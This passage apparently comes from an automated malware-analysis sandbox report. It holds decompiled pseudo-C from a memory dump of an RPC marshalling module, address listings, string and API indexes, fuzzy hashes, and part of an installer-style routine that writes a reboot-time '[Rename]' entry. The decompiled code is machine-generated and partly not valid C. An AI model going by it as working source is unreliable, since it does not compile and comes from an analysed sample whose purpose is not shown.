                                                                                                									__esp = __esp + 8;
                                                                                                									_push(__eax);
                                                                                                									_push("longlong=%s <= %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__edx =  *(__ebp + 8);
                                                                                                									E6EDAB030( *(__ebp + 8),  *(__ebp + 0xc), 8) =  *(__ebp + 0xc);
                                                                                                									__eax =  *(__ebp + 0xc) + 8;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t200 + 0x10) =  &(( *(_t200 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 5:
                                                                                                									L13:
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__esp = __esp - 8;
                                                                                                									asm("movsd xmm0, [edx]");
                                                                                                									asm("movsd [esp], xmm0");
                                                                                                									_push("double=%f <= %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0x10;
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 8);
                                                                                                									__eax = E6EDAB030( *(__ebp + 8),  *(__ebp + 0xc), 8);
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t200 + 0x10) =  &(( *(_t200 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 6:
                                                                                                									L6:
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									 *(__ebp - 4) =  *( *(__ebp + 0xc));
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__eax =  *( *(__ebp + 0xc));
                                                                                                									_push( *( *(__ebp + 0xc)));
                                                                                                									_push("enum16=%d <= %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									if( *( *(__ebp + 0xc)) > 0x7fff) {
                                                                                                										_push(0x6f5);
                                                                                                										__imp__RpcRaiseException();
                                                                                                									}
                                                                                                									L8:
                                                                                                									__edx = __ebp - 4;
                                                                                                									 *(__ebp + 8) = E6EDAB030( *(__ebp + 8), __ebp - 4, 2);
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t200 + 0x10) =  &(( *(_t200 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 7:
                                                                                                									L14:
                                                                                                									 *(__ebp - 0x18) = 0;
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__edx =  *( *(__ebp + 0xc));
                                                                                                									_push( *( *(__ebp + 0xc)));
                                                                                                									_push("pointer=%p <= %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__eax =  *(__ebp + 8);
                                                                                                									__ecx =  *(__eax + 4);
                                                                                                									_push( *(__eax + 4));
                                                                                                									_push("pStubMsg->Buffer before %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 8;
                                                                                                									__edx =  *(__ebp + 0x10);
                                                                                                									__eax =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                                									if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
                                                                                                										__ecx =  *(__ebp + 0x10);
                                                                                                										 *(__ebp + 0x14) =  *(__ebp + 0x10);
                                                                                                									}
                                                                                                									__edx =  *(__ebp + 0x14);
                                                                                                									__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                                									if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
                                                                                                										__ecx =  *(__ebp + 8);
                                                                                                										__ecx =  *(__ebp + 8) + 4;
                                                                                                										__eax = E6EDA7400( *(__ebp + 8) + 4,  *(__ebp + 8) + 4, 4);
                                                                                                									}
                                                                                                									__edx =  *(__ebp + 8);
                                                                                                									__eax =  *(__edx + 4);
                                                                                                									 *(__ebp - 0x1c) =  *(__edx + 4);
                                                                                                									__ecx =  *(__ebp + 8);
                                                                                                									if( *( *(__ebp + 8) + 0x34) == 0) {
                                                                                                										__eax =  *(__ebp + 0x14);
                                                                                                										__ecx =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                                										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
                                                                                                											__edx =  *(__ebp + 8);
                                                                                                											__eax = E6EDAAF00( *(__ebp + 8), 4);
                                                                                                										}
                                                                                                									} else {
                                                                                                										__edx =  *(__ebp + 8);
                                                                                                										__eax =  *(__ebp + 8);
                                                                                                										__ecx =  *(__eax + 0x34);
                                                                                                										 *( *(__ebp + 8) + 4) =  *(__eax + 0x34);
                                                                                                										__edx =  *(__ebp + 8);
                                                                                                										 *( *(__ebp + 8) + 0x34) = 0;
                                                                                                										 *(__ebp - 0x18) = 1;
                                                                                                									}
                                                                                                									__eax =  *(__ebp + 0x14);
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__edx =  *( *(__ebp + 0xc));
                                                                                                									__eax =  *(__ebp - 0x1c);
                                                                                                									__ecx =  *(__ebp + 8);
                                                                                                									__eax = E6EDAB220( *(__ebp + 8),  *(__ebp - 0x1c),  *( *(__ebp + 0xc)),  *(__ebp + 0x14));
                                                                                                									if( *(__ebp - 0x18) == 0) {
                                                                                                										L28:
                                                                                                										__edx =  *(__ebp + 8);
                                                                                                										__eax =  *(__edx + 4);
                                                                                                										_push( *(__edx + 4));
                                                                                                										_push("pStubMsg->Buffer after %p\n");
                                                                                                										0x6eda0000();
                                                                                                										__esp = __esp + 8;
                                                                                                										__ecx =  *(__ebp + 0x10);
                                                                                                										__edx =  *__ecx & 0x000000ff;
                                                                                                										if(( *__ecx & 0x000000ff) != 0x36) {
                                                                                                											__ecx =  *(__ebp + 0x10);
                                                                                                											__ecx =  *(__ebp + 0x10) + 4;
                                                                                                											 *(__ebp + 0x10) = __ecx;
                                                                                                										} else {
                                                                                                											 *(__ebp + 0x14) =  *(__ebp + 0x14) + 4;
                                                                                                											 *(__ebp + 0x14) =  *(__ebp + 0x14) + 4;
                                                                                                										}
                                                                                                										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                										while(1) {
                                                                                                											L44:
                                                                                                											 *(_t200 + 0x10) =  &(( *(_t200 + 0x10))[1]);
                                                                                                											goto L1;
                                                                                                										}
                                                                                                									} else {
                                                                                                										do {
                                                                                                											L23:
                                                                                                											__edx =  *(__ebp + 8);
                                                                                                											__eax =  *(__edx + 0x14);
                                                                                                											_push( *(__edx + 0x14));
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											__edx =  *( *(__ebp + 8));
                                                                                                											__eax =  *(__ebp + 8);
                                                                                                											 *(__eax + 4) =  *(__eax + 4) -  *(__edx + 8);
                                                                                                											_push( *(__eax + 4) -  *(__edx + 8));
                                                                                                											_push("buffer=%d/%d\n");
                                                                                                											0x6eda0000();
                                                                                                											__esp = __esp + 0xc;
                                                                                                											__edx =  *(__ebp + 8);
                                                                                                											__eax =  *( *(__ebp + 8));
                                                                                                											__ecx =  *(__eax + 8);
                                                                                                											__edx =  *(__ebp + 8);
                                                                                                											__ecx =  *(__eax + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
                                                                                                											__eax =  *(__ebp + 8);
                                                                                                											if( *( *(__ebp + 8) + 4) > __ecx) {
                                                                                                												__ecx =  *(__ebp + 8);
                                                                                                												__edx =  *( *(__ebp + 8));
                                                                                                												__eax =  *(__edx + 8);
                                                                                                												__ecx =  *(__ebp + 8);
                                                                                                												__eax =  *(__edx + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
                                                                                                												__edx =  *(__ebp + 8);
                                                                                                												 *(__edx + 4) =  *(__edx + 4) - __eax;
                                                                                                												_push( *(__edx + 4) - __eax);
                                                                                                												_push("buffer overflow %d bytes\n");
                                                                                                												0x6eda0000();
                                                                                                												__esp = __esp + 8;
                                                                                                											}
                                                                                                											__edx = 0;
                                                                                                										} while (0 != 0);
                                                                                                										__eax =  *(__ebp + 8);
                                                                                                										__ecx =  *(__ebp + 8);
                                                                                                										__edx =  *(__ecx + 4);
                                                                                                										 *( *(__ebp + 8) + 0x34) =  *(__ecx + 4);
                                                                                                										__eax =  *(__ebp + 8);
                                                                                                										__ecx =  *(__ebp - 0x1c);
                                                                                                										 *( *(__ebp + 8) + 4) =  *(__ebp - 0x1c);
                                                                                                										__edx =  *(__ebp + 0x14);
                                                                                                										__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                                										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											__eax = E6EDAAF00( *(__ebp + 8), 4);
                                                                                                										}
                                                                                                										goto L28;
                                                                                                									}
                                                                                                								case 8:
                                                                                                									L32:
                                                                                                									__eax =  *(__ebp - 0x10);
                                                                                                									__ecx = __ebp + 0xc;
                                                                                                									__eax = E6EDA7450(__ecx, __ecx,  *(__ebp - 0x10), 2);
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t200 + 0x10) =  &(( *(_t200 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 9:
                                                                                                									L33:
                                                                                                									__edx =  *(__ebp - 0x10);
                                                                                                									__ebp + 0xc = E6EDA7450(__ecx, __ebp + 0xc,  *(__ebp - 0x10), 4);
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t200 + 0x10) =  &(( *(_t200 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xa:
                                                                                                									L34:
                                                                                                									__ecx =  *(__ebp - 0x10);
                                                                                                									__edx = __ebp + 0xc;
                                                                                                									__eax = E6EDA7450(__ecx, __ebp + 0xc, __ecx, 8);
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t200 + 0x10) =  &(( *(_t200 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xb:
                                                                                                									L35:
                                                                                                									__eax =  *(__ebp + 0x10);
                                                                                                									__ecx =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__eax = __edx + __ecx - 0x3c;
                                                                                                									 *(__ebp + 0xc) = __edx + __ecx - 0x3c;
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t200 + 0x10) =  &(( *(_t200 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xc:
                                                                                                									L36:
                                                                                                									1 = 1 << 0;
                                                                                                									__edx =  *(__ebp + 0x10);
                                                                                                									 *(__edx + (1 << 0)) & 0x000000ff = ( *(__edx + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 0xc) = ( *(__edx + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									__edx =  *(__ebp + 0x10);
                                                                                                									 *( *(__ebp + 0x10)) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
                                                                                                									 *(__ebp - 8) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
                                                                                                									__ecx =  *(__ebp - 8);
                                                                                                									__edx =  *(__ebp + 8);
                                                                                                									 *(__ebp - 0x20) = E6EDAE3A0( *(__ebp + 8),  *(__ebp - 8));
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__ecx =  *(__ebp - 0x20);
                                                                                                									_push( *(__ebp - 0x20));
                                                                                                									_push("embedded complex (size=%d) <= %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__edx =  *(__ebp - 8);
                                                                                                									__eax =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                                									__eax =  *( *(__ebp - 8)) & 0x7f;
                                                                                                									__ecx =  *(0x6edbb218 + __eax * 4);
                                                                                                									 *(__ebp - 0x14) =  *(0x6edbb218 + __eax * 4);
                                                                                                									if( *(__ebp - 0x14) == 0) {
                                                                                                										__edx =  *(__ebp - 8);
                                                                                                										__eax =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                                										_push( *( *(__ebp - 8)) & 0x000000ff);
                                                                                                										_push("no marshaller for embedded type %02x\n");
                                                                                                										0x6eda0000();
                                                                                                										__esp = __esp + 8;
                                                                                                									} else {
                                                                                                										__edx =  *(__ebp - 8);
                                                                                                										__eax =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                                										if(( *( *(__ebp - 8)) & 0x000000ff) != 0x2f) {
                                                                                                											__edx =  *(__ebp - 8);
                                                                                                											_push( *(__ebp - 8));
                                                                                                											__eax =  *(__ebp + 0xc);
                                                                                                											_push( *(__ebp + 0xc));
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											_push( *(__ebp + 8));
                                                                                                											__eax =  *(__ebp - 0x14)();
                                                                                                										} else {
                                                                                                											__ecx =  *(__ebp - 8);
                                                                                                											_push( *(__ebp - 8));
                                                                                                											__edx =  *(__ebp + 0xc);
                                                                                                											__eax =  *( *(__ebp + 0xc));
                                                                                                											_push( *( *(__ebp + 0xc)));
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											_push( *(__ebp + 8));
                                                                                                											__eax =  *(__ebp - 0x14)();
                                                                                                										}
                                                                                                									}
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) +  *(__ebp - 0x20);
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									goto L1;
                                                                                                								case 0xd:
                                                                                                									goto L0;
                                                                                                								case 0xe:
                                                                                                									L10:
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__eax =  *( *(__ebp + 0xc));
                                                                                                									 *(__ebp - 0x24) =  *( *(__ebp + 0xc));
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__eax =  *( *(__ebp + 0xc));
                                                                                                									_push( *( *(__ebp + 0xc)));
                                                                                                									_push("int3264=%ld <= %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__ecx = __ebp - 0x24;
                                                                                                									__edx =  *(__ebp + 8);
                                                                                                									E6EDAB030( *(__ebp + 8), __ebp - 0x24, 4) =  *(__ebp + 0xc);
                                                                                                									__eax =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t200 + 0x10) =  &(( *(_t200 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xf:
                                                                                                									goto L43;
                                                                                                							}
                                                                                                						}
                                                                                                						return  *(_t200 + 0xc);
                                                                                                					}
                                                                                                				}
                                                                                                			}





                                                                                                0x6eda9063
                                                                                                0x6eda906b
                                                                                                0x6eda906e
                                                                                                0x6eda9071
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda90b8
                                                                                                0x6eda90b8
                                                                                                0x6eda90bb
                                                                                                0x6eda90bc
                                                                                                0x6eda90bf
                                                                                                0x6eda90c3
                                                                                                0x6eda90c6
                                                                                                0x6eda90cb
                                                                                                0x6eda90d0
                                                                                                0x6eda90d5
                                                                                                0x6eda90da
                                                                                                0x6eda90de
                                                                                                0x6eda90e2
                                                                                                0x6eda90ed
                                                                                                0x6eda90f0
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda90f8
                                                                                                0x6eda90f8
                                                                                                0x6eda90fb
                                                                                                0x6eda90fc
                                                                                                0x6eda90ff
                                                                                                0x6eda9102
                                                                                                0x6eda9103
                                                                                                0x6eda9105
                                                                                                0x6eda9106
                                                                                                0x6eda910b
                                                                                                0x6eda910e
                                                                                                0x6eda910f
                                                                                                0x6eda9114
                                                                                                0x6eda9119
                                                                                                0x6eda911e
                                                                                                0x6eda9122
                                                                                                0x6eda912e
                                                                                                0x6eda9131
                                                                                                0x6eda9134
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda913c
                                                                                                0x6eda913c
                                                                                                0x6eda913f
                                                                                                0x6eda9140
                                                                                                0x6eda9143
                                                                                                0x6eda9146
                                                                                                0x6eda914a
                                                                                                0x6eda914f
                                                                                                0x6eda9154
                                                                                                0x6eda9159
                                                                                                0x6eda915e
                                                                                                0x6eda9162
                                                                                                0x6eda9166
                                                                                                0x6eda9171
                                                                                                0x6eda9174
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda8feb
                                                                                                0x6eda8feb
                                                                                                0x6eda8ff1
                                                                                                0x6eda8ff5
                                                                                                0x6eda8ff8
                                                                                                0x6eda8ff9
                                                                                                0x6eda8ffc
                                                                                                0x6eda8ffe
                                                                                                0x6eda8fff
                                                                                                0x6eda9004
                                                                                                0x6eda9009
                                                                                                0x6eda900c
                                                                                                0x6eda9015
                                                                                                0x6eda9017
                                                                                                0x6eda901c
                                                                                                0x6eda901c
                                                                                                0x6eda9022
                                                                                                0x6eda9024
                                                                                                0x6eda902c
                                                                                                0x6eda9034
                                                                                                0x6eda9037
                                                                                                0x6eda903a
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda917c
                                                                                                0x6eda917c
                                                                                                0x6eda9183
                                                                                                0x6eda9186
                                                                                                0x6eda9187
                                                                                                0x6eda918a
                                                                                                0x6eda918c
                                                                                                0x6eda918d
                                                                                                0x6eda9192
                                                                                                0x6eda9197
                                                                                                0x6eda919a
                                                                                                0x6eda919d
                                                                                                0x6eda91a0
                                                                                                0x6eda91a1
                                                                                                0x6eda91a6
                                                                                                0x6eda91ab
                                                                                                0x6eda91ae
                                                                                                0x6eda91b1
                                                                                                0x6eda91b7
                                                                                                0x6eda91b9
                                                                                                0x6eda91bc
                                                                                                0x6eda91bc
                                                                                                0x6eda91bf
                                                                                                0x6eda91c2
                                                                                                0x6eda91c8
                                                                                                0x6eda91cc
                                                                                                0x6eda91cf
                                                                                                0x6eda91d3
                                                                                                0x6eda91d8
                                                                                                0x6eda91db
                                                                                                0x6eda91de
                                                                                                0x6eda91e1
                                                                                                0x6eda91e4
                                                                                                0x6eda91eb
                                                                                                0x6eda920c
                                                                                                0x6eda920f
                                                                                                0x6eda9215
                                                                                                0x6eda9219
                                                                                                0x6eda921d
                                                                                                0x6eda9222
                                                                                                0x6eda91ed
                                                                                                0x6eda91ed
                                                                                                0x6eda91f0
                                                                                                0x6eda91f3
                                                                                                0x6eda91f6
                                                                                                0x6eda91f9
                                                                                                0x6eda91fc
                                                                                                0x6eda9203
                                                                                                0x6eda9203
                                                                                                0x6eda9225
                                                                                                0x6eda9229
                                                                                                0x6eda922c
                                                                                                0x6eda922f
                                                                                                0x6eda9233
                                                                                                0x6eda9237
                                                                                                0x6eda9243
                                                                                                0x6eda92d8
                                                                                                0x6eda92d8
                                                                                                0x6eda92db
                                                                                                0x6eda92de
                                                                                                0x6eda92df
                                                                                                0x6eda92e4
                                                                                                0x6eda92e9
                                                                                                0x6eda92ec
                                                                                                0x6eda92ef
                                                                                                0x6eda92f5
                                                                                                0x6eda9302
                                                                                                0x6eda9305
                                                                                                0x6eda9308
                                                                                                0x6eda92f7
                                                                                                0x6eda92fa
                                                                                                0x6eda92fd
                                                                                                0x6eda92fd
                                                                                                0x6eda930e
                                                                                                0x6eda9311
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x6eda9249
                                                                                                0x6eda9249
                                                                                                0x6eda9249
                                                                                                0x6eda9249
                                                                                                0x6eda924c
                                                                                                0x6eda924f
                                                                                                0x6eda9250
                                                                                                0x6eda9253
                                                                                                0x6eda9255
                                                                                                0x6eda925b
                                                                                                0x6eda925e
                                                                                                0x6eda925f
                                                                                                0x6eda9264
                                                                                                0x6eda9269
                                                                                                0x6eda926c
                                                                                                0x6eda926f
                                                                                                0x6eda9271
                                                                                                0x6eda9274
                                                                                                0x6eda9277
                                                                                                0x6eda927a
                                                                                                0x6eda9280
                                                                                                0x6eda9282
                                                                                                0x6eda9285
                                                                                                0x6eda9287
                                                                                                0x6eda928a
                                                                                                0x6eda928d
                                                                                                0x6eda9290
                                                                                                0x6eda9296
                                                                                                0x6eda9298
                                                                                                0x6eda9299
                                                                                                0x6eda929e
                                                                                                0x6eda92a3
                                                                                                0x6eda92a3
                                                                                                0x6eda92a6
                                                                                                0x6eda92a6
                                                                                                0x6eda92aa
                                                                                                0x6eda92ad
                                                                                                0x6eda92b0
                                                                                                0x6eda92b3
                                                                                                0x6eda92b6
                                                                                                0x6eda92b9
                                                                                                0x6eda92bc
                                                                                                0x6eda92bf
                                                                                                0x6eda92c2
                                                                                                0x6eda92c8
                                                                                                0x6eda92cc
                                                                                                0x6eda92d0
                                                                                                0x6eda92d5
                                                                                                0x00000000
                                                                                                0x6eda92c8
                                                                                                0x00000000
                                                                                                0x6eda9319
                                                                                                0x6eda931b
                                                                                                0x6eda931f
                                                                                                0x6eda9323
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda9330
                                                                                                0x6eda9332
                                                                                                0x6eda933a
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda9347
                                                                                                0x6eda9349
                                                                                                0x6eda934d
                                                                                                0x6eda9351
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F5), ref: 6EDA901C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: buffer overflow %d bytes$buffer=%d/%d$byte=%d <= %p$double=%f <= %p$enum16=%d <= %p$float=%f <= %p$long=%d <= %p$longlong=%s <= %p$pStubMsg->Buffer after %p$pStubMsg->Buffer before %p$pointer=%p <= %p$short=%d <= %p
                                                                                                • API String ID: 3997070919-1788898343
                                                                                                • Opcode ID: 0fbe82e4cd4381bf12e82c7ab4edd2e523962862b5af9cafdd420c3ab85c49ca
                                                                                                • Instruction ID: 320f1a9135b48f16c22392e89c0c6a9da22f787578cca490c9a613452bffa0a8
                                                                                                • Opcode Fuzzy Hash: 0fbe82e4cd4381bf12e82c7ab4edd2e523962862b5af9cafdd420c3ab85c49ca
                                                                                                • Instruction Fuzzy Hash: 30C14CB9A00109AFCB04CF98D890EAA7B76EF89354F14C518FA194F345E731EB51CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F4), ref: 6EDAB2E5
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDAB485
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p,%p,%p,%p)$NULL ref pointer is not allowed$buffer overflow %d bytes$buffer=%d/%d$calling marshaller for type 0x%x$deref => %p$no marshaller for data type=%02x$type=0x%x, attr=$unhandled ptr type=%02x$writing 0x%08x to buffer$writing 0x%08x to buffer
                                                                                                • API String ID: 3997070919-1660405780
                                                                                                • Opcode ID: 0ff7522f63dbc8d8d04eb5eb07b7cf4b67a7a45af825e81f6fc776535811c331
                                                                                                • Instruction ID: 38d53aa75f8936b577beb00ba3d3b952bf2a8c88ed32d994207809642bac6c8e
                                                                                                • Opcode Fuzzy Hash: 0ff7522f63dbc8d8d04eb5eb07b7cf4b67a7a45af825e81f6fc776535811c331
                                                                                                • Instruction Fuzzy Hash: 30B19DB590014AEFDB04DF98C890ABE7BB2EF89305F1481A9E9455B385D335EB41CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 93%
                                                                                                			E00405679() {
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				intOrPtr* _t15;
                                                                                                				long _t16;
                                                                                                				intOrPtr _t18;
                                                                                                				int _t20;
                                                                                                				void* _t28;
                                                                                                				long _t29;
                                                                                                				intOrPtr* _t37;
                                                                                                				int _t43;
                                                                                                				void* _t44;
                                                                                                				long _t47;
                                                                                                				CHAR* _t49;
                                                                                                				void* _t51;
                                                                                                				void* _t53;
                                                                                                				intOrPtr* _t54;
                                                                                                				void* _t55;
                                                                                                				void* _t56;
                                                                                                
                                                                                                				_t15 = E00405C49(1);
                                                                                                				_t49 =  *(_t55 + 0x18);
                                                                                                				if(_t15 != 0) {
                                                                                                					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
                                                                                                					if(_t20 != 0) {
                                                                                                						L16:
                                                                                                						 *0x42ebf0 =  *0x42ebf0 + 1;
                                                                                                						return _t20;
                                                                                                					}
                                                                                                				}
                                                                                                				 *0x42c168 = 0x4c554e;
                                                                                                				if(_t49 == 0) {
                                                                                                					L5:
                                                                                                					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x42bbe0, 0x400);
                                                                                                					if(_t16 != 0 && _t16 <= 0x400) {
                                                                                                						_t43 = wsprintfA(0x42b7e0, "%s=%s\r\n", 0x42c168, 0x42bbe0);
                                                                                                						_t18 =  *0x42eb70; // 0x5ff628
                                                                                                						_t56 = _t55 + 0x10;
                                                                                                						E0040594D(_t43, 0x400, 0x42bbe0, 0x42bbe0,  *((intOrPtr*)(_t18 + 0x128)));
                                                                                                						_t20 = E00405602(0x42bbe0, 0xc0000000, 4);
                                                                                                						_t53 = _t20;
                                                                                                						 *(_t56 + 0x14) = _t53;
                                                                                                						if(_t53 == 0xffffffff) {
                                                                                                							goto L16;
                                                                                                						}
                                                                                                						_t47 = GetFileSize(_t53, 0);
                                                                                                						_t7 = _t43 + 0xa; // 0xa
                                                                                                						_t51 = GlobalAlloc(0x40, _t47 + _t7);
                                                                                                						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
                                                                                                							L15:
                                                                                                							_t20 = CloseHandle(_t53);
                                                                                                							goto L16;
                                                                                                						} else {
                                                                                                							if(E00405577(_t51, "[Rename]\r\n") != 0) {
                                                                                                								_t28 = E00405577(_t26 + 0xa, 0x409328);
                                                                                                								if(_t28 == 0) {
                                                                                                									L13:
                                                                                                									_t29 = _t47;
                                                                                                									L14:
                                                                                                									E004055C3(_t51 + _t29, 0x42b7e0, _t43);
                                                                                                									SetFilePointer(_t53, 0, 0, 0);
                                                                                                									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
